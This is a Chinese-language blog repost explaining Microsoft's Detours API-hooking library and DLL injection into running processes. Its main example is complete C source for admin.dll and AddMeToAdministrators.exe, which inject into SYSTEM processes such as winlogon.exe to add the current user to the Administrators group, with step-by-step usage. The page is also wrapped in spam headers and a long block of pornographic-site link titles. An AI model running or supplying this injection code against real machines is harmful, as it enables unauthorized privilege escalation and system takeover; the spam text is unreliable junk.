青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

旅途

如果想飛得高,就該把地平線忘掉

用DETOURS庫獲取NT管理員權(quán)限

---- Detours是微軟開發(fā)的一個函數(shù)庫(源代碼可在http://research.microsoft.com/sn/detours 免費獲得), 用于修改運行中的程序在內(nèi)存中的影像,從而即使沒有源代碼也能改變程序的行為。具體用途是:

攔截WIN32 API調(diào)用,將其引導到自己的子程序,從而實現(xiàn)WIN32 API的定制。
為一個已在運行的進程創(chuàng)建一新線程,裝入自己的代碼并運行。
---- 本文將簡介Detours的原理,Detours庫函數(shù)的用法, 并利用Detours庫函數(shù)在Windows NT上編寫了一個程序,該程序能使有“調(diào)試程序”的用戶權(quán)限的用戶成為系統(tǒng)管理員,附錄利用Detours庫函數(shù)修改該程序使普通用戶即可成為系統(tǒng)管理 員.


一. Detours的原理

---- 1. WIN32進程的內(nèi)存管理

---- 總所周知,WINDOWS NT實現(xiàn)了虛擬存儲器,每一WIN32進程擁有4GB的虛存空間, 關(guān)于WIN32進程的虛存結(jié)構(gòu)及其操作的具體細節(jié)請參閱WIN32 API手冊, 以下僅指出與Detours相關(guān)的幾點:

---- (1) 進程要執(zhí)行的指令也放在虛存空間中
---- (2) 可以使用QueryProtectEx函數(shù)把存放指令的頁面的權(quán)限更改為可讀可寫可執(zhí)行,再改寫其內(nèi)容,從而修改正在運行的程序
---- (3) 可以使用VirtualAllocEx從一個進程為另一正運行的進程分配虛存,再使用 QueryProtectEx函數(shù)把頁面的權(quán)限更改為可讀可寫可執(zhí)行,并把要執(zhí)行的指令以二進制機器碼的形式寫入,從而為一個正在運行的進程注入任意的代碼

---- 2. 攔截WIN32 API的原理

---- Detours定義了三個概念:

---- (1) Target函數(shù):要攔截的函數(shù),通常為Windows的API。
---- (2) Trampoline函數(shù):Target函數(shù)的復制品。因為Detours將會改寫Target函數(shù),所以先把Target函數(shù)復制保存好,一方面仍然保存Target函數(shù)的過程調(diào)用語義,另一方面便于以后的恢復。
---- (3) Detour 函數(shù):用來替代Target函數(shù)的函數(shù)。

---- Detours在Target函數(shù)的開頭加入JMP Address_of_ Detour_ Function指令(共5個字節(jié))把對Target函數(shù)的調(diào)用引導到自己的Detour函數(shù), 把Target函數(shù)的開頭的5個字節(jié)加上JMP Address_of_ Target _ Function+5作為Trampoline函數(shù)。例子如下:

攔截前:Target _ Function:
 ;Target函數(shù)入口,以下為假想的常見的子程序入口代碼
 push  ebp
 mov  ebp,  esp
 push  eax
 push  ebx
 Trampoline:
 ;以下是Target函數(shù)的繼續(xù)部分
 ……

攔截后: Target _ Function:
 jmp  Detour_Function
 Trampoline:
 ;以下是Target函數(shù)的繼續(xù)部分
 ……

 Trampoline_Function:
 ; Trampoline函數(shù)入口, 開頭的5個字節(jié)與Target函數(shù)相同
 push  ebp
 mov  ebp,  esp
 push  eax
 push  ebx
 ;跳回去繼續(xù)執(zhí)行Target函數(shù)
 jmp  Target_Function+5
---- 3. 為一個已在運行的進程裝入一個DLL

---- 以下是其步驟:

---- (1) 創(chuàng)建一個ThreadFuction,內(nèi)容僅是調(diào)用LoadLibrary。
---- (2) 用VirtualAllocEx為一個已在運行的進程分配一片虛存,并把權(quán)限更改為可讀可寫可執(zhí)行。
---- (3) 把ThreadFuction的二進制機器碼寫入這片虛存。
---- (4) 用CreateRemoteThread在該進程上創(chuàng)建一個線程,傳入前面分配的虛存的起始地址作為線程函數(shù)的地址,即可為一個已在運行的進程裝入一個DLL。通過DllMain 即可在一個已在運行的進程中運行自己的代碼。

二. Detours庫函數(shù)的用法

---- 因為Detours軟件包并沒有附帶幫助文件,以下接口僅從剖析源代碼得出。

---- 1. PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)

---- 功能:從一DLL中找出一函數(shù)的入口地址
---- 參數(shù):pszModule是DLL名,pszFunction是函數(shù)名。
---- 返回:名為pszModule的DLL的名為pszFunction的函數(shù)的入口地址
---- 說明:DetourFindFunction除使用GetProcAddress外,還直接分析DLL的文件頭,因此可以找到一些GetProcAddress找不到的函數(shù)入口。

---- 2. DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
---- 功能:該宏把名為target_name 的Target函數(shù)生成Trampoline函數(shù),以后調(diào)用 trampoline_prototype在語義上等于調(diào)用Target函數(shù)。

---- 3. BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour)
---- 功能:用Detour 函數(shù)攔截Target函數(shù)
---- 參數(shù):pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函數(shù)的入口地址。

---- 4. BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour)
---- 功能:恢復Target函數(shù)
---- 參數(shù):pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函數(shù)的入口地址。

---- 5. BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
---- 功能:為一個已在運行的進程裝入一個DLL
---- 參數(shù):hProcess是進程的句柄,lpDllName是要裝入的DLL名

三. 程序?qū)嵗?

---- 以一個能使有“調(diào)試程序”的用戶權(quán)限的用戶成為系統(tǒng)管理員的程序做例子說明Detours 庫函數(shù)的用法。程序的設(shè)計思路是找一個以System帳號運行的進程,如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等,使用ContinueProcessWithDll在其中注入把當前用戶加入到 Administrators本地組的DLL,因為該DLL在這些進程的安全上下文環(huán)境運行,所以有相應的權(quán)限。

---- 先編寫相應的DLL:

/*admin.dll, 當進程裝入時會把名為szAccountName
 的用戶加入到Administrators本地組。*/

#include
#include
#include
#include

/*以下創(chuàng)建一共享段實現(xiàn)進程間的數(shù)據(jù)通訊,
 szAccountName 是用戶名,bPrepared說明
 szAccountName是否已初始化。*/

#pragma data_seg(".MYSHARE")
BOOL bPrepared=FALSE;
wchar_t szAccountName[100]={0};
#pragma data_seg()

#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/*程序調(diào)用SetAccountName設(shè)置要加入到Administrators
 本地組的用戶名,并通知DllMain
 已初始化szAccountName ,
 以后被裝入時可調(diào)用ElevatePriv */

__declspec(dllexport) VOID WINAPI
 SetAccountName(wchar_t *Name)
{
wcscpy(szAccountName,Name);
bPrepared=TRUE;
}

/*把名為szAccountName的用戶加入
 到Administrators本地組*/

__declspec(dllexport) VOID WINAPI ElevatePriv()
{
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
NetLocalGroupAddMembers(NULL,L"Administrators",
3,(LPBYTE)&account,1);
}

__declspec(dllexport) ULONG WINAPI
DllMain(HINSTANCE hInstance,
DWORD dwReason, PVOID lpReserved)
{
switch (dwReason) {
 case DLL_THREAD_ATTACH:
 if (bPrepared)
   ElevatePriv();
}
return TRUE;
}

程序如下:

/*AddMeToAdministrators.exe 把當前用戶加入到
 Administrators本地組。使用方法為:(1)
---- 運行任務管理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的進程ID (2)執(zhí)行AddMeToAdministrators.exe procid, 其中procid為(1)記下的進程ID (3)簽退再簽到,運行用戶管理器,即可發(fā)現(xiàn)自己已在Administrators本地組中。*/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用戶名稱*/

void GetCurrentUser(wchar_t *szName)
{
 HANDLE hProcess, hAccessToken;
 wchar_t InfoBuffer[1000],szAccountName[200],
 szDomainName[200];
 PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
 DWORD dwInfoBufferSize,dwAccountSize = 200,
 dwDomainSize = 200;
 SID_NAME_USE snu;

 hProcess = GetCurrentProcess();

 OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

 GetTokenInformation(hAccessToken,TokenUser,
 InfoBuffer,
     1000, &dwInfoBufferSize);

 LookupAccountSid(NULL, pTokenUser->User.Sid,
 szAccountName,
     &dwAccountSize,szDomainName, &dwDomainSize, &snu);
 wcscpy(szName,szDomainName);
 wcscat(szName,L"\\");
 wcscat(szName,szAccountName);
}

/* EnablePrivilege啟用自己的“調(diào)試程序”的用戶權(quán)限*/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(),
           TOKEN_ADJUST_PRIVILEGES, &hToken))
 return FALSE;
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, szPrivName,
&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken, FALSE, &tp,
sizeof(tp), NULL, NULL);
return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
LPSTR lpszCmdLine, int
nCmdShow)
{
INT argc;
WCHAR **argv;
argv = CommandLineToArgvW(GetCommandLineW(),
&argc);
INT nProcessId = -1;
if (argc!=2){
 wprintf(L"usage %s pid", argv[0]);
 return 1;
}
nProcessId = _wtoi(argv[1]);
printf("%d\n",nProcessId);
---- /*要成功執(zhí)行ContinueProcessWithDll,要對winlogon.exe等進程的進程句柄有讀寫存儲器內(nèi)容和創(chuàng)建線程的權(quán)限,EnablePrivilege使本進程有這樣的權(quán)利。*/

if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
 printf("AdjustTokenPrivilege Fail %u\n",
(UINT)GetLastError());
 return 1;
}
HANDLE  gNewHandle =
OpenProcess(PROCESS_ALL_ACCESS
, TRUE, nProcessId);
if (!gNewHandle){
 printf("OpenProcess Fail %u\n",
(UINT)GetLastError());
 return 1;
}
 wchar_t szName[100];
GetCurrentUser(szName);
SetAccountName(szName);
If (!ContinueProcessWithDll(gNewHandle,
L"c:\\temp\\admin.dll")) {
 printf("ContinueProcessWithDll failed %u",
(UINT)GetLastError());
 return 3;
}
return 0;
}
---- 因為“調(diào)試程序”的用戶權(quán)限缺省情況下僅賦予給管理員,因此并不會造成安全漏洞。但該程序揭示出“調(diào)試程序”的用戶權(quán)限其實是至高無上的用戶權(quán)限,只能授予給可信用戶。

四. 結(jié)論 ---- Detours是一強大的工具,提供了簡單易用的函數(shù)接口來攔截WIN32 API調(diào)用和為一個已在運行的進程裝入一個DLL。  
 

Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1628087


posted on 2007-07-29 13:10 旅途 閱讀(549) 評論(0)  編輯 收藏 引用 所屬分類: 深入windows

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            欧美搞黄网站| 久久久国产精品一区| 欧美日韩亚洲一区在线观看| 美日韩在线观看| 亚洲欧美在线高清| 亚洲视频狠狠| 亚洲一区二区av电影| 亚洲在线中文字幕| 欧美一区二区三区日韩| 欧美一区在线视频| 美脚丝袜一区二区三区在线观看 | 亚洲视频1区| 亚洲男人的天堂在线| 欧美中文在线免费| 欧美高清视频免费观看| aa级大片欧美三级| 久久精品免费观看| 欧美jizzhd精品欧美巨大免费| 欧美日韩国产一区二区三区地区| 国产精品稀缺呦系列在线| 一区二区在线看| 亚洲午夜久久久久久久久电影网| 久久国产精品久久国产精品| 欧美激情亚洲激情| 午夜精品久久久久久| 美女91精品| 欧美日韩一区不卡| 久久久99爱| 亚洲精品乱码| 性伦欧美刺激片在线观看| 久久躁狠狠躁夜夜爽| 一本色道久久综合狠狠躁篇怎么玩 | 欧美色123| 亚洲国产精品综合| 欧美在线黄色| 日韩一区二区精品在线观看| 久久婷婷成人综合色| 国产精品欧美一区二区三区奶水| 日韩午夜在线观看视频| 久久嫩草精品久久久精品| 亚洲日韩视频| 久久噜噜亚洲综合| 国产日韩av一区二区| 一级成人国产| 国产精品色婷婷久久58| 91久久在线| 久久免费黄色| 亚洲视频网在线直播| 欧美成人激情在线| 亚洲丶国产丶欧美一区二区三区| 久久久99爱| 欧美诱惑福利视频| 国产一区二区黄| 久久精品夜色噜噜亚洲a∨| 一区二区三区日韩精品| 欧美日韩免费| 亚洲一卡二卡三卡四卡五卡| 亚洲黄色在线| 欧美日韩的一区二区| 在线亚洲美日韩| 中国成人亚色综合网站| 欧美午夜无遮挡| 亚洲综合国产激情另类一区| 在线一区日本视频| 国产精品美女久久久久久免费 | 亚洲午夜精品| 国产精品欧美日韩一区二区| 欧美一级理论性理论a| 午夜精品久久久久久久久| 国产一区二区三区在线观看网站| 久久先锋影音av| 久热成人在线视频| 亚洲人成绝费网站色www| 亚洲精选久久| 国产精品magnet| 午夜精品视频在线观看| 午夜在线电影亚洲一区| 蜜桃视频一区| 一区二区三区欧美激情| 最新国产乱人伦偷精品免费网站| 欧美成人久久| 一本一本久久| 亚洲综合首页| 精品1区2区3区4区| 欧美国产日韩一二三区| 欧美黄色视屏| 亚洲免费观看高清完整版在线观看熊 | 国语自产精品视频在线看8查询8 | 亚洲一区黄色| 亚洲欧美国产精品桃花| 一区精品在线播放| 99国内精品久久久久久久软件| 国产精品美女999| 久久这里只精品最新地址| 欧美人妖另类| 欧美一区二区三区在线播放| 免费久久久一本精品久久区| 亚洲小视频在线观看| 久久gogo国模裸体人体| 亚洲精品一二区| 午夜亚洲一区| 夜夜狂射影院欧美极品| 久久精品综合一区| 亚洲一区二区在线视频| 久久综合九九| 欧美中文字幕视频| 欧美久久婷婷综合色| 久久久久久网址| 欧美性淫爽ww久久久久无| 榴莲视频成人在线观看| 国产精品家教| 亚洲精品乱码久久久久久| 一区二区三区在线观看国产| 亚洲一品av免费观看| 亚洲精品三级| 老妇喷水一区二区三区| 欧美在线观看视频一区二区| 欧美日韩的一区二区| 亚洲成人中文| 在线观看视频日韩| 午夜欧美理论片| 亚洲欧美一区二区精品久久久| 欧美二区在线播放| 免费成人av在线看| 国产曰批免费观看久久久| 亚洲图片欧美日产| 一区二区三区日韩精品视频| 美女网站在线免费欧美精品| 免费试看一区| 在线国产精品一区| 久久久免费精品| 久久视频一区| 狠狠色丁香久久婷婷综合丁香| 亚洲伦理在线免费看| 欧美日韩人人澡狠狠躁视频| 香蕉av福利精品导航| 日韩亚洲欧美中文三级| 久久中文字幕一区二区三区| 久久蜜臀精品av| 一区在线视频观看| 久久精品国产综合精品| 麻豆乱码国产一区二区三区| 国产一区视频在线观看免费| 欧美在线亚洲综合一区| 久久精品色图| 国模套图日韩精品一区二区| 性欧美大战久久久久久久久| 久久视频一区二区| 亚洲国产成人av好男人在线观看| 久久久av网站| 亚洲欧洲一区| 亚洲视频在线看| 国产精品毛片a∨一区二区三区|国| 日韩视频一区二区三区| 亚洲资源在线观看| 国产精品揄拍500视频| 久久九九电影| 91久久精品日日躁夜夜躁国产| 一区二区久久久久久| 国产精品福利网站| 久久av在线看| 亚洲精品一区久久久久久| 亚洲欧美日韩直播| 国产最新精品精品你懂的| 久久综合电影| 在线视频精品| 久久亚洲视频| 一区二区福利| 国产亚洲精品aa| 欧美77777| 亚洲在线一区二区| 美女久久网站| 亚洲综合欧美日韩| 影音先锋久久资源网| 欧美日产在线观看| 欧美一区二区三区四区视频 | 夜夜嗨av一区二区三区| 国产精品国产自产拍高清av| 久久精品欧美| 99视频热这里只有精品免费| 久久久久久久综合| 99re亚洲国产精品| 国产一区99| 国产精品v日韩精品v欧美精品网站| 久久激情视频久久| 亚洲另类视频| 欧美大片第1页| 欧美一区二区三区日韩视频| 日韩亚洲不卡在线| 在线看国产日韩| 国产女主播一区二区三区| 欧美精品日本| 六月天综合网| 欧美一区国产一区| 亚洲伦理在线| 亚洲欧洲一二三| 亚洲第一久久影院| 久久深夜福利免费观看| 午夜在线a亚洲v天堂网2018| 日韩视频中文字幕|